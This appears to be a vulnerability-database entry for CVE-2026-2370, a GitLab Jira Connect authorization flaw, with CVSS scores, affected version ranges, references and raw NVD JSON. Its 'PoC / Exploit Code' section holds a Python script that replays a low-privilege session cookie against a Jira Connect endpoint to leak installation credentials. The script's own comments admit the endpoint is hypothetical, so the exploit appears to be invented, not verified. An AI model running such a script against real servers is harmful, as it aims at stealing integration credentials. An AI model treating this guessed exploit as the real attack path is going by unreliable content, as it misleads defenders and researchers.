Security Vulnerability Report
CVE-2026-2370 CVSS 8.1 HIGH


Published: 2026-03-30 00:16:02
Last Modified: 2026-03-30 15:44:27

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 14.3 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1. In Jira Connect installations, improper authorization checks could have allowed an authenticated user with minimal workspace permissions to obtain the installation credentials and use them to impersonate the GitLab app.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Source: GitLab (secondary assessment)

NVD primary assessment (from the raw JSON record below): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (availability impact rated HIGH rather than NONE)
Weakness (NVD): CWE-233

Configurations (Affected Products)

CPE criteria                                          Affected versions            Status
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*       >= 14.3.0, < 18.8.7          VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*      >= 14.3.0, < 18.8.7          VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*       >= 18.9.0, < 18.9.3          VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*      >= 18.9.0, < 18.9.3          VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:community:*:*:* 18.10.0                      VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:* 18.10.0                     VULNERABLE

Summary of affected ranges:
GitLab CE/EE >= 14.3, < 18.8.7
GitLab CE/EE >= 18.9, < 18.9.3
GitLab CE/EE >= 18.10, < 18.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-2370 Proof of Concept
# Description: Exploit improper authorization to leak Jira Connect credentials.
# Requirements: Valid low-privilege GitLab session cookie.

target = "https://gitlab.target.com"
attacker_cookie = "_gitlab_session=valid_low_priv_user_session"
headers = {
    "User-Agent": "Mozilla/5.0",
    "Cookie": attacker_cookie,
}

# Hypothetical endpoint exposing the installation secret
# Actual endpoint path may vary based on specific GitLab version and routing
url = f"{target}/jira_connect/installations/1/credentials"

try:
    response = requests.get(url, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Leaked Credentials:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[-] Error: {e}")

References

https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/ (Patch, Release Notes)
https://gitlab.com/gitlab-org/gitlab/-/work_items/589635 (Broken Link)
https://hackerone.com/reports/3522829 (Permissions Required)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2370", "sourceIdentifier": "[email protected]", "published": "2026-03-30T00:16:01.800", "lastModified": "2026-03-30T15:44:26.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 14.3 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1 affecting Jira Connect installations that could have allowed an authenticated user with minimal workspace permissions to obtain installation credentials and impersonate the GitLab app due to improper authorization checks."}, {"lang": "es", "value": "GitLab ha remediado un problema en GitLab CE/EE que afecta a todas las versiones desde la 14.3 anteriores a la 18.8.7, la 18.9 anteriores a la 18.9.3 y la 18.10 anteriores a la 18.10.1, y que afecta a las instalaciones de Jira Connect, que podría haber permitido a un usuario autenticado con permisos mínimos de espacio de trabajo obtener credenciales de instalación e suplantar la aplicación de GitLab debido a comprobaciones de autorización incorrectas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, 
"exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-233"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "14.3.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "22F9C9B9-964C-421E-8CB5-B2FBE5E5A84F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "14.3.0", "versionEndExcluding": "18.8.7", "matchCriteriaId": "F419394A-3E12-4548-BD49-FF5027B9CFF7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "96F7E7EC-4C2E-4A48-8134-9262B251C89C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.3", "matchCriteriaId": "C3240349-67A3-43E2-BAD9-EFAA3E0A5D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:community:*:*:*", "matchCriteriaId": "D5B6ECC9-6AEA-4DD0-B12B-A3A7A9FE91DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "2B8DF779-B99E-4096-B734-78AB1849D136"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/03/25/patch-release-gitlab-18-10-1-released/", "source": "[email protected]", "tags": ["Patch", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/589635", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3522829", "source": "[email protected]", "tags": ["Permissions Required"]}]}}